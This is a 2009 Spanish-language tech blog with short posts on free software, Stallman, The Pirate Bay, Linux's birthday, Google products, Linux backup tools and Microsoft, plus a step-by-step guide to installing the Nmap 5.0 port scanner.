Es que quizás lo importante no es llegar de cualquier manera al gran público, es llegar con ideas del software libre, me interesa la idea de compartir, de proteger la privacidad.
Ubuntu no ayuda a la gente a valorar su libertad. Ellos podrían haber ayudado al movimiento pero no lo hicieron.

jueves, 27 de agosto de 2009

Stallman fundamentalista o fumanchón?

Voy a compartir con ustedes extractos de más reciente entrevista realizada a Richard Stallman por el diario Página/12:

Usted usualmente no navega por Internet ni utiliza celular, ¿verdad?

“Es verdad, por motivos diferentes. No navego con mi computadora, pero no pienso que es algo malo, es sólo una penitencia personal, digamos, pero no digo que deban hacer lo mismo. En cuanto al teléfono celular, no quiero tener uno porque son instrumentos de vigilacia y seguimiento. Hasta un punto es inevitable para hacer o recibir llamadas, el sistema necesita saber donde está uno, pero no me gusta que algo sepa dónde estoy siempre, entonces prefiero no tenerlo”.

En cuanto al celular algo de razón tiene... pero para tanto?

¿Me puede contar cómo surge San IGNUcio, esa segunda personalidad suya que lo muestra ante el público como un santo hereje de la informática?

“Es una broma. Siempre tuve la ambición de ser un actor cómico, y una vez alguien que no estaba de acuerdo con el movimiento de software libre me acusó de ser un imán loco, entonces decidí burlarme de él y de mí mismo. Pero en realidad, la primera vez que lo personifiqué fue en una fiesta de disfraces en California. Había olvidado llevar un disfraz y en la casa de una amiga en la que estaba había un viejo disco duro y tuve la idea de usarlo como aureola y presentarme como santo, y fui a la fiesta como San IGNUcio. Luego, la semana siguiente tuve que ir a México a unas conferencias y decidí presentar a San IGNUcio y la audiencia se río mucho. Y a través de los años he añadido más bromas a mi rutina cómica”.

Richard deja de fumar!!!

Nosotros nos creemos freakys pero este tipo ya volcó por completo...

miércoles, 26 de agosto de 2009

Volvió The Pirate Bay ;)

The Pirate Bay el lunes había quedado offline luego de que su ISP llamado "Black Internet" acatara una orden judicial...

Hoy The Pirate Bay cambió de ISP logró volver a estar online y cambio su portada por:

Puede observarse una remera con la leyenda: Desperdicié meses y millones de dólares para cerrar The Pirate Bay y todo lo que obtuve es esta hermosa remera”

En el blog oficial los creadores escribieron
Nosotros no fallaremos. Seguiremos hasta el final” ;)

martes, 25 de agosto de 2009

Linux cumple 18 años :)

Hoy (25 de Agosto) es el cumple numero 18 de GNU/Linux!!!


La historia de este gran SO comenzo el 25 de Agosto de 1991, cuando un estudiante de 22 años de Helsinki (Finlandia) llamado Linus Torvalds escribía el siguiente mensaje (traducido) en comp.os.minix:

" Hola a todos los que usáis minix -

Estoy desarrollando un sistema operativo (gratuito) (sólo un hobby, no será nada tan grande y profesional como gnu) para clones 386(486) AT. Se viene cocinando desde abril, y está empezando a estar listo. Me gustaría recibir opiniones sobre las cosas que les gusta o disgusta a la gente de minix, ya que mi sistema operativo se parece un poco (la misma distribución física del sistema de archivos (debido a razones prácticas) entre otras cosas).

Por ahora he portado bash (1.08) y gcc(1.40), y las cosas parecen funcionar. Esto implica que tendré algo de utilidad en unos pocos meses, y me gustaría saber qué características le gustaría ver incorporadas a la mayoría de la gente. Cualquier sugerencia es bienvenida, pero no prometo implementarlas todas :-)

Linus (torvalds@kruuna.helsinki.fi)

PD. Sí -- no utiliza nada del código de minix, y tiene un sistema de ficheros multi hilo. NO es portable (utiliza el cambio de tarea del 386 etc), y probablemente nunca soportará otra cosa que no sean los discos duros AT, dado que es todo lo que tengo :-( ."


Cabe destacar que en esa epoca Linux invirtió mucha $$ en comprar una PC de última generación PC386 a 33 Mhz y con 4MB de RAM. Usaba Minix, pero no le gustaba, así que se propuso como proyecto personal la creación de un pequeño sistema operativo similar, pero distinto ;)

Así nació el proyecto Linux...

Linus fue poco a poco añadiendo más características hasta que el 17 de Septiembre de 1991 se publicó en Internet Linux v0.01. La primera versión ocupaba 62 KB!

Para los más freakys la primar versión de Linux sigue disponible ACA

Después Linux se unió al proyecto GNU, que estaban también haciendo un sistema operativo con un kernel propio llamado “hurd“, pero que no estaba muy avanzado -como hasta hoy en día :P -, así que se optó por unirse y formar lo que hoy llamamos GNU/Linux.


miércoles, 19 de agosto de 2009

Click2Try

Click2try es un servicio web que te permitirá probar en online múltiples aplicaciones libres, gestores de contenidos y hasta algunas distribuciones de Linux

Click2try

Como se usa?

Tenes que acceder al catálogo de aplicaciones (catalogadas como negocios, linux, etc) y elegir alguna.

En principio, no hace falta estar registrado para probar las distintas herramientas, aunque quienes lo hagan podrán guardar los cambios realizados en sus sesiones para volver a ellas en el futuro. Registrarse es gratis, aunque existe una modalidad “Premium” para quienes quieran obtener algunas ventajas adicionales.

Es una herramienta más que útil para cualquier Freaky

martes, 11 de agosto de 2009

Google Caffeine

"La misión de Google es organizar la información mundial para que resulte universalmente accesible y útil"

Bajo ese lema Google
anunció de manera oficial su nuevo proyecto llamado Caffeine que tiene por objetivo "dar una nueva arquitectura a la búsqueda web"

Como los ingenieros logran esto?

Mejorando el tamaño del índice del buscador, la velocidad a la que se indexan resultados y la exactitud y relevancia de los resultados.

Por último Sitaram Iyer dijo:

Para construir un gran motor de búsqueda se necesita: rastrear una gran porción de la web; indexar los resultados de las páginas y saber qué tanta reputación tienen; y rankear y devolver las páginas más relevantes para las búsquedas de los usuarios lo más rápido posible”.

viernes, 7 de agosto de 2009

Bug Critico en Windows 7

La versión RTM de Windows 7 presenta un fallo crítico que podría provocar un retraso en el lanzamiento del producto, previsto para el 22 de octubre.


El bug afecta tanto a la versión de 32 como a la de 64 bits y se trata de pérdida masiva de memoria que ocurre cuando la utilidad chkdsk.exe está corriendo... jejeje

Más info acá

[HUMOR] Diferencia entre Bug y nuevo Feature




Dedicado a los Window$ Users!!

jueves, 6 de agosto de 2009

TOP3 de Back-Up tools para Linux

Fwbackups

fwbackups 10 extraordinarias herramientas para hacer copias de seguridad en Linux

Es la solución más sencilla hacer back-ups en GNU/Linux

Es multiplataforma, tiene una interfaz amigable para el usuario, y puede hacer backups individuales o programados. También te permite hacer backups tanto local como remótamente en formato tar, tar.gz, tar.bz2 ó rsync.

Podes sacar copias de un sólo archivo hasta un equipo entero. Además es una de las pocas soluciones que trae integrada una herramienta de restauración.

También soporta backups incrementales ó diferenciales para acelerar el proceso.

Mondorescue

screenshotsf 10 extraordinarias herramientas para hacer copias de seguridad en Linux

Mondorescue es una herramienta de recuperación ante de desastres utilizada por muchas empresas, ya que permite hacer backups a una instalación entera (tipo Ghost).

Otra de las capacidades de Mondorescue es que puede copiar la información a casi cualquier medio: CD, DVD, casset, NFS, disco duro, etc. y soporta muchos sistemas de archivos como LVM 1/2, RAID, ext2, ext3, ext4, JFS, XFS, ReiserFS, y VFAT.

Simple Backup Solution

dbimage 10 extraordinarias herramientas para hacer copias de seguridad en Linux

Simple Backup Solution está enfocado especialmente para hacer backups de sistemas de escritorio (como UBuntu).

Puede hacer backup de archivos y directorios y permite usar expresiones regulares para propósitos de exclusión. Permite hacer copias personalizadas, manuales y programadas.

Tiene una interfaz amigable para el usuario, pero tiene 2 contras:

* Debido a que usa archivos comprimidos, no es la mejor solución para hacer backups de datos pre-comprimidos (como archivos multimedia).

* No incluye una herramienta para restaurar la información como lo hace fwbackups.

lunes, 3 de agosto de 2009

Google Wave

El 30 de Septiembre se lanza la beta de Google Wave!!

Define:"Google Wave"

Es un servicio de Google que fusiona el mail, el chat y el blog, entre otras cosas.

Video oficial al respecto:



Resumen en español:

jueves, 23 de julio de 2009

The Pirate Bay paga!


The Pirate Bay anunció que comenzarán a pagarles a aquellos usuarios que compartan archivos
Y le cobrarán a los proveedores por aligerar el tráfico en sus redes

Global Gaming Factory es la nueva dueña de The Pirate Bay, Hans Pandeya dijo "La compañía cotiza en Bolsa, entonces todo lo que hacemos tiene que ser legal. Los proveedores de contenidos necesitan ser remunerados y conseguir que sus deseos y demandas coincidan..."

Necesitas marihuana, Iphone te ayuda a buscar dealers!

Apple aprobó en su appstore un soft llamado "Cannabis" que permite localizar puestos de venta legales de marihuana para los consumidores de cannabis medicinal (seee "medicinal").

La nueva aplicación esta disponible para Estados Unidos (su principal foco es California) y en los lugares donde fue aprobado su consumo para uso medicinal - como: Canadá, Austria, los Países Bajos, España, Israel, Finlandia y Portugal -.

La aplicación funciona con Google Maps e indica los lugares más cercanos a tu ubicación donde podrás conseguir algún dealer legal...

Mientras los países estudian la forma de cobrar un impuesto a las drogas, Apple ya esta haciendo negocios con eso cobrando U$S 2,00 por la aplicación mencionada.

lunes, 20 de julio de 2009

Nmap v5.0

El día 16 del corriente mes Fyodor anunció que se liberaba la versión 5 del famoso port scanner NMAP.

Las novedades son que: se repararon bugs, se agregaron más firmas de OS Fingerprinting, se modificó la lista de puertos a scannear por default y se mejoró la performance en general.

Si quieren más detalle sobre las novedades visiten:

Release notes de nmap v5.0 y

Cambios de versiones anteriores a nmap v5.0


Para instalar el Nmap v5.0 con el Zenmap incluido tienen 2 opciones:

1- Compilar el código

Instalar dependencias:

apt-get install python3
apt-get install python-pysqlite2
apt-get install build-essential

Bajar el código fuente de la versión 5 desde: http://nmap.org/dist/nmap-5.00.tar.bz2

Descomprimir el archivo:

bzip2 -cd nmap-5.00.tar.bz2 | tar xvf -

Entrar al directorio:

cd nmap-5.00

Compilar el código:

./configure --prefix=/nmap
make
make install

Copiar los archivos a /usr/sbin/:

cd /nmap/bin
cp * /usr/bin

2- Instalar nmap desde un .deb:

Para los que quieran instalar directamente un .deb, acá les dejo este creado por mi: http://www.megaupload.com/?d=C26QCL5O

Ejecutan:

dpkg -i nmap5.deb

Copian los archivos a /usr/sbin/:

cd /nmap/bin
cp * /usr/bin

Por último, para corroborar que quedo bien instalado, ejecutar:

nmap -V

Si aparece "Nmap version 5.00 (http://nmap.org)" es porque ya quedo todo OK

Happy Hacking!

viernes, 17 de julio de 2009

[Bizarro] Tema Freaky del verano

Un freaky saco el típico tema pegadizo del verano.

El estribillo es "soy el disco duro del amor..." imaginen lo bizarro q es el tema!

Que lo disfruten:



Gracias a Pablo por su aporte a la comunidad freak!

jueves, 16 de julio de 2009

Microsoft subestima Google Chrome OS

Estos días Micro$oft estuvo haciendo comentarios / criticas referidas a Google y especialmente al Google Chrome OS...


Bill Veghte -portavoz de Microsoft - dijo:
"Por
ahora, Chrome es un simple comentario en un blog..."

Micro$oft fundamenta esto diciendo que pasó mucho tiempo antes que Google lanzara definitivamente su paquete de aplicaciones ofimáticas on-line, que fueron consideradas como una alternativa a Office.

Este comentario es totalmente oportunista ya que esta misma semana
Micro$oft va a dar una conferencia a gran escala para partners en Nueva Orleans donde intentaran convencer al público de que Windows 7 es el mejor SO de escritorio (WAF?!)



Walid Abu-Hadba - Vicepresidente de Desarrollo- dijo:
"Gran parte de lo que Google hace es defensivo..."

Yo diria que gran parte de lo que hace Micro$oft es ofensivo... jejeje

Esa declaración se puede interpretar como Micro$oft considera que Google no es una empresa innovadora....

La pregunta es: Microsoft es una empresa innovadora o siempre corre con desventaja y copia a Linux y Mac creando productos con un gran Marketing??

Se dieron cuenta de la cara de gomas que tienen?? :D

lunes, 13 de julio de 2009

Screenshots del Google Chrome OS

Estimados Freakys, a pedido de varios de ustedes acá esta el screenshot del escritorio del Chrome OS:

A pesar de que muchos pensamos que este SO seguramente en un mediano plazo comenzará a destronar a Windows... hay que tener en cuenta de que probablemente primero reemplace a SOs de escritorios alternativos (como Ubuntu) u otras distros de linux.

Por qué?

Obviamente por contratos con fabricantes que traeran dicho SO pre instalado y seguramente los fabricantes que hoy en dia instalan Ubuntu instalen el Google Chrome OS

Aca tienen un link donde se analiza el tema en detalle...